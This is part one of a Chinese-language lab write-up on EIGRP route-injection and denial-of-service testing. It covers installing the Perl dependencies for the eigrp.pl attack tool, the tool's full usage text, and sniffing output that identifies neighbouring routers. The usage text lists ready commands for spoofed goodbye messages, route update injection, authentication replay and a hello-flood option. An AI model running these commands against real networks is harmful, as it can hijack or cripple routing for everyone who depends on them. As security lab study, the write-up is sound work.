Eigrp恶意插入路由和致瘫攻击测试(一)
 
此次测试采用的环境依然遵循 《OSPF插入恶意路由攻击测试》一文中的基本拓扑,结构如下,我们将利用36这台attack主机压入恶意路由。
我们已经将动态路由协议运行成eigrp,并且收敛完毕。
这里,需要一个采用perl脚本工具来完成这次试验,具体文件附件中可以下载。我们同样采用ubuntu作为攻击平台。
获得eigrp-tools.pl,解开至任意目录,可以看到非常简单的文件:
-rwxrwxrwx  1 sc   sc    1120 2005-12-19 06:58 eigrp.conf
-rwxrwxrwx  1 sc   sc   36259 2005-12-19 06:58 eigrp.pl
-rwxrwxrwx  1 sc   sc    1004 2005-12-19 07:00 MINI-README
这里说明下,.pl是主要的攻击脚本,.conf是为了方便使用者,可以用配置文件的方式把参数预设好,一旦pl指令中没有输入这些参数,将从该配置文件读取。
 

一、检查perl脚本环境

拿到脚本或源码,向来是不指望一次成功的,先看看缺什么。
root@sc-desktop:~/eigrp-tools # perl eigrp.pl
Can't locate Net/RawIp.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at eigrp.pl line 9.
BEGIN failed--compilation aborted at eigrp.pl line 9.
 
这里提下解决问题的思路,外事问google,内事问狗狗,这是外事,我们求助google。
任何问题(除了你未来的老婆叫什么……貌似这个现在也有很多算命网站可以测)基本都有答案,所以路在嘴上这句话没错,关键在于怎么搜索;在我看来,递归的查询方式是最有效的,我们以此例为证。
不用假设,我也是个perl盲,在这次试验中,我仅仅是想使用这个perl脚本做网络攻击测试,而非去研究perl本身,所以要抓住主要矛盾。
 
1、首先我们搜索这句“Can't locate Net/RawIp.pm in”,先看看有没有直接的解决办法,结果得到的信息非常零碎,有人在问同样的问题,但是提供的解答都是请安装模块。
 
2、接下来转变方向,搜索“perl install modular”,这下很多了,如何安装有非常详细的教程。这里,我们不去看完整的教程,只需找google结果中相应的实例。我找到了一条只有几句话的结果,其中提到了cpan。
 
3、立刻在bash下尝试cpan,得到了cpan[1]>提示符,根据自觉,应该是进入到了某种模式界面,类似与mysql>;help一下,看到了install字样。
 
4、立刻尝试:
cpan[5]> install rawip
Warning: Cannot install rawip, don't know what it is.
Try the command
 
    i /rawip/
 
to find objects with matching identifiers.
 
5、很好,虽然它不懂我要干什么,但是有提示了,显然是不知道名字吧,那我们照着提示做:
cpan[6]> i /rawip/
Distribution    SAPER/Net-RawIP-0.25.tar.gz
Module    Net::RawIP             (SAPER/Net-RawIP-0.25.tar.gz)
Module    Net::RawIP::ethhdr     (SAPER/Net-RawIP-0.25.tar.gz)
Module    Net::RawIP::generichdr (SAPER/Net-RawIP-0.25.tar.gz)
Module    Net::RawIP::icmphdr    (SAPER/Net-RawIP-0.25.tar.gz)
Module    Net::RawIP::iphdr      (SAPER/Net-RawIP-0.25.tar.gz)
Module    Net::RawIP::opt        (SAPER/Net-RawIP-0.25.tar.gz)
Module    Net::RawIP::tcphdr     (SAPER/Net-RawIP-0.25.tar.gz)
Module    Net::RawIP::udphdr     (SAPER/Net-RawIP-0.25.tar.gz)
9 items found
 
6、原来是我没有入乡随俗,我们要客随主便:
cpan[7]> install Net::RawIP
Running install for module 'Net::RawIP'
CPAN: Data::Dumper loaded ok (v2.121_14)
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/root/.cpan/prefs'
Running make for S/SA/SAPER/Net-RawIP-0.25.tar.gz
CPAN: LWP::UserAgent loaded ok (v5.810)
 
I would like to connect to .e of the following sites to get 'authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz':
 
 
Is it OK to try to connect to the Internet? [yes] 
Fetching with LWP:
   [url]http://www.perl.org/CPAN/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz[/url]
CPAN: Digest::SHA loaded ok (v5.45)
Checksum for /root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz ok
Scanning cache /root/.cpan/build for sizes
.............................(省略).........................................
CPAN: File::Temp loaded ok (v0.18)
Warning (usually harmless): 'YAML' not installed, will not store persistent state
 
  CPAN.pm: Going to build S/SA/SAPER/Net-RawIP-0.25.tar.gz
 
Compiler: cc
cc (Ubuntu 4.3.2-1ubuntu11) 4.3.2
Copyright © 2008 Free Software Foundation, Inc.
本程序是自由软件;请参看源代码的版权声明。本软件没有任何担保;
包括没有适销性和某一专用目的下的适用性担保。
 
Could not load the pcap library. Please see the README file . how
to install it. Be sure to also install the C headers (pcap.h).
Warning: No success . command[/usr/bin/perl Makefile.PL INSTALLDIRS=site]
Warning (usually harmless): 'YAML' not installed, will not store persistent state
  SAPER/Net-RawIP-0.25.tar.gz
  /usr/bin/perl Makefile.PL INSTALLDIRS=site -- NOT OK
Running make test
  Make had some problems, won't test
Running make install
  Make had some problems, won't install
Could not read '/root/.cpan/build/Net-RawIP-0.25-Yx2FXb/META.yml'. Falling back to other methods to determine prerequisites
Failed during this command:
 SAPER/Net-RawIP-0.25.tar.gz                  : writemakefile NO '/usr/bin/perl Makefile.PL INSTALLDIRS=site' returned status 512
 
没有安装成功,但是它告知了问题,一个是YAML没有装,另一个是缺pcap.h;凭直觉,后者应该是系统的包。
 
7、先解决YAML:
cpan[11]> install YAML
Running install for module 'YAML'
'YAML' not installed, falling back to Data::Dumper and Storable to read prefs '/root/.cpan/prefs'
Running make for I/IN/INGY/YAML-0.68.tar.gz
Fetching with LWP:
   [url]http://www.perl.org/CPAN/authors/id/I/IN/INGY/YAML-0.68.tar.gz[/url]
Fetching with LWP:
   [url]http://www.perl.org/CPAN/authors/id/I/IN/INGY/CHECKSUMS[/url]
Checksum for /root/.cpan/sources/authors/id/I/IN/INGY/YAML-0.68.tar.gz ok
............................................................................DONE
Found 1 old build, restored the state of 1
顺利安装成功。
 
8、接下来再搜pcap.h,可以看到需要安装libpcap的dev包。其实这里有个捷径,因为我们之前已经下载了“/root/.cpan/sources/authors/id/S/SA/SAPER/Net-RawIP-0.25.tar.gz”,可以进这个包看里面的readme,也会提到安装pcap.h的问题。这里apt-get install libpcap0.8-dev即可。
 
9、这次再install Net::RawIP成功了。再次运行eigrp脚本,报缺NetPacket/Ethernet.pm,用同样的方式查询后安装,顺利完成。
采用这种思路解决问题,速度较快,但是缺点也很明显,街头篮球,完整的知识体系较为欠缺,没有对perl产生完整的概念。
 
现在,环境准备完毕了,可以看下这个脚本的强大参数:
 
root@sc-desktop:~/eigrp-tools # perl eigrp.pl
Using config file eigrp.conf...
eigrp.pl, , V 0.1 
This program was originally created for the book "Hacking Exposed: Cisco Networks"  
Authors Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs and comments 
to info[dot]arhont.com
 
usage: eigrp.pl  [--sniff] [ --iface=inteterface ] [--timeout=i]
 
Options:
  --sniff                  Sniff eigrp packets
  --iface                  Listen . an interface
  --iflist                 List all available network interfaces
  --source                 Source IP address 
  --dest                   Packet destination IP. Default multicast IP - 224.0.0.10
  --timeout=n              pcap init timeout (500 default)
  --hello                  Send EIGRP HELLO
  --update                 Update route
  --query                  Send [Query] (Unreachable destination ) 
  --external               External route 
  --internal               Internal route
  --ipgoodbye=s            IP to [Goodbye message] Authentification replay not implemented
  --file2ip=s              Send raw sniffed eigrp data from file to IP
  --payback                Sniff the UPDATE packet, change [Delay] and send it back (PoC)   
  --op=n                   EIGRP opcode number to trigger, capture a packet defined by the trigger .to a disk
  --sn=n                   EIGRP sequence number to trigger 
  --auth                   Authentication data for the reply atack (copy past hex from sniff)
  --opcode                 Custom opcode for hello packets fuzzing
  --flags=n                EIGRP flags (0,1 or 2)
  --version=n              EIGRP version [8 bit integer] Default = 2
  --as=n                   Autonomous system number, Default = 1
  --k1=n                   Metric K1 Default 1
  --k2=n                   Mertic K2 Default 0
  --k3=n                   Mertic K3 Default 1
  --k4=n                   Mertic K4 Default 0
  --k5=n                   Mertic K4 Default 0
  --mtu=n                  MTU 
  --nms=n                  Add NMS (Next multicast message) to Hello packet  
  --eigrpv=s               EIGRP release version
  --ios=s                  IOS version              
  --hopcount=n             Hop count
  --reliability=n          Reliability
  --load=n                 Load
  --delay=n                Delay
  --sequence=n             Sequence  (32bit sequence)  Default = 0
  --ack=n                  Acknowledge (32bit sequence) Default = 0
  --nexthop=s              Next Hop
  --bandwidth=n            Bandwidth
  --routedest=s            Route destination
  --origrouter=s           Originating router
  --origas=n               Originating Autonomous system number
  --arbitatag=n            Arbitrary tag
  --metric=n               protocol metric (external EIGRP metric for the external updates)
  --extproto=n             External protocol ID IGRP(1) EIGRP(2) Static Route(3) RIP(4) 
                           HELLO(5) OSPF(6) IS_IS(7) EGP(8) BGP(9) IDRP(10) Connected link(11)
  --hold=n                 Hold time in seconds
  --hellotime=n            Hello send retries timeout . Default = 5 sec
  --hellodos=s             IP subnet. Warning! Nasty DOS atack ! Send HELLO EIGRP Argument from IP range. 
  --retries=n              Packet send retries Default = 1;                        
Example :
./eigrp.pl --sniff --iface eth0
./eigrp.pl --ipgoodbye 192.168.66.202 --source 192.168.7.8
./eigrp.pl --file2ip update.dat --source 192.168.7.8
./eigrp.pl --update --external --as 65534 --source 192.168.7.8
./eigrp.pl --hello --auth 00020010000000020000000000000000000000000efe07403446c77a9697fe5753f79e52
 --source 192.168.77.8 --nms 1 
./eigrp.pl --help This message
 root@sc-desktop:~/eigrp-tools #
 

二、探测周边环境

利用脚本中的嗅探功能,检查一下周围的环境,如果是在陌生环境中,可以借此了解拓扑信息。
 
root@sc-desktop:~/eigrp-tools # ./eigrp.pl --sniff --iface eth0
Using config file eigrp.conf...
./eigrp.pl, , V 0.1 
Use of uninitialized value in subroutine entry at /usr/local/lib/perl/5.10.0/Net/RawIP.pm line 640.
Link Offset: 14..
 
Sniffing interface: eth0
 
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a 
         Source IP: 192.168.1.249 Dest IP:224.0.0.10 
**************************************************************** 
         HexDump (high nybble first): 
 02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
 00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02 
         Version: 2 
         Opcode:05 <Hello/Ack> 
         Checksum: 0xeecb <* Correct *>  
         Flags: 0   Sequnce :0 
          Acknowledge: 0 
         Autonomus system number: 1 
<<<EIGRP Parameters: 0001 >>> 
         Size: 12 
         K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,  
         Reserved: 0 Hold Time: 15 
<<<Software Version 0004 >>> 
         Size: 8 
         IOS version: 12.4 
         EIGRP version 1.2
 
***************************************************************
Source MAC:c2030d400000 Dest MAC:01005e00000a 
         Source IP: 192.168.1.251 Dest IP:224.0.0.10 
**************************************************************** 
         HexDump (high nybble first): 
 02 05 ee cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 0c 01
 00 01 00 00 00 00 0f 00 04 00 08 0c 04 01 02 
         Version: 2 
         Opcode:05 <Hello/Ack> 
         Checksum: 0xeecb <* Correct *>  
         Flags: 0   Sequnce :0 
          Acknowledge: 0 
         Autonomus system number: 1 
<<<EIGRP Parameters: 0001 >>> 
         Size: 12 
         K1: 1 K2: 0 K3: 1 K4: 0 K5: 0,  
         Reserved: 0 Hold Time: 15 
<<<Software Version 0004 >>> 
         Size: 8 
         IOS version: 12.4 
         EIGRP version 1.2
 
我们可以看到网内的两台eigrp路由器,eigrp版本,ios版本;
水煮豆豆注:这里要特别提下K值的问题,很多学习过eigrp的人对K值不甚理解,cisco花了很大的力气设计出5个值,却又建议用户不要随便修改。其实我们可以简单的这样理解,K值作为一个高阶用户参数的存在,是为了提供更大的网络设计灵活性,调整5个参数可以方便的在延时和稳定性方面做出选择,究竟是要更稳定还是要更小的延时。仅此而已。
 
现在,我们的攻击方和被攻击的路由器都准备好了,可以开始进行实验。